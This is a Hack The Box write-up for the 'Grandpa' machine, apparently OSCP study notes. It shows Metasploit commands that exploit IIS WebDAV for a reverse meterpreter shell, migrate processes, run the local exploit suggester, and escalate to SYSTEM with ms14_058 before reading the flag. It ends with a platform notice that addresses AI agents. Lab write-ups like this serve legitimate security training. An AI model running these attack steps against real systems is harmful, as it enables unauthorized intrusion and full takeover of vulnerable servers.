# Exploitation ## Metasploit Exploitation ``` msfconsole use exploit/windows/iis/iis_webdav_scstoragepathfromurl set RHOST 10.10.10.14 set LHOST tun0 run ``` ![](/files/-MMvSTC_0X8mzxD_VMUw) We have gotten a shell, unfortunatley, when we try to runn *getuid* it does not work and we get an error. This means we are running an unstable process. To fix this, we have to check what processes are running on the box and migrate to the one that is running with the same priveleges that the meterpreter session is running with. ``` meterpreter > ps Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Process] 4 0 System 276 4 smss.exe 324 276 csrss.exe 348 276 winlogon.exe 396 348 services.exe 408 348 lsass.exe 584 396 svchost.exe 680 396 svchost.exe 740 396 svchost.exe 764 396 svchost.exe 800 396 svchost.exe 936 396 spoolsv.exe 964 396 msdtc.exe 1084 396 cisvc.exe 1104 1852 rundll32.exe x86 0 C:\WINDOWS\system32\rundll32.exe 1124 396 svchost.exe 1180 396 inetinfo.exe 1216 396 svchost.exe 1324 396 VGAuthService.exe 1408 396 vmtoolsd.exe 1456 396 svchost.exe 1492 348 logon.scr 1628 396 alg.exe 1664 396 svchost.exe 1796 584 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe 1852 1456 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe 1916 396 dllhost.exe 2304 584 wmiprvse.exe 2692 584 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe 3872 1084 cidaemon.exe 3916 1084 cidaemon.exe 3944 1084 cidaemon.exe ``` ``` migrate 1852 ``` ![](/files/-MMvTjv0KRGn6ivJJg0X) Now we have a stable working meterpreter session. We have low privleges, however we need to Escalate to SYSTEM. Put the session in **background** and use local exploit suggestor *local\_exploit\_suggester* ``` search local_exploit_suggester use local_exploit_suggester set SESSION 1 run msf6 post(multi/recon/local_exploit_suggester) > run [*] 10.10.10.14 - Collecting local exploits for x86/windows... [*] 10.10.10.14 - 35 exploit checks are being tried... nil versions are discouraged and will be deprecated in Rubygems 4 [+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated. [+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable. [+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable. [+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable. [+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated. [+] 10.10.10.14 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable. [+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable. [*] Post module execution completed use exploit/windows/local/ms14_058_track_popup_menu set SESSION 1 set LHOST tun0 run shell ``` ``` meterpreter > shell Process 1080 created. Channel 2 created. Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. c:\windows\system32\inetsrv>cd C:\Documents and Settings\Administrator cd C:\Documents and Settings\Administrator C:\Documents and Settings\Administrator>cd Desktop cd Desktop C:\Documents and Settings\Administrator\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is 246C-D7FE Directory of C:\Documents and Settings\Administrator\Desktop 04/12/2017 04:28 PM . 04/12/2017 04:28 PM .. 04/12/2017 04:29 PM 32 root.txt 1 File(s) 32 bytes 2 Dir(s) 18,091,487,232 bytes free C:\Documents and Settings\Administrator\Desktop>type root.txt type root.txt 9359e905a2c35f861f6a57cecf28bb7b C:\Documents and Settings\Administrator\Desktop> ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://manuelvazquez-contact.gitbook.io/oscp-prep/hack-the-box-windows/grandpa-come-back/exploitation.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.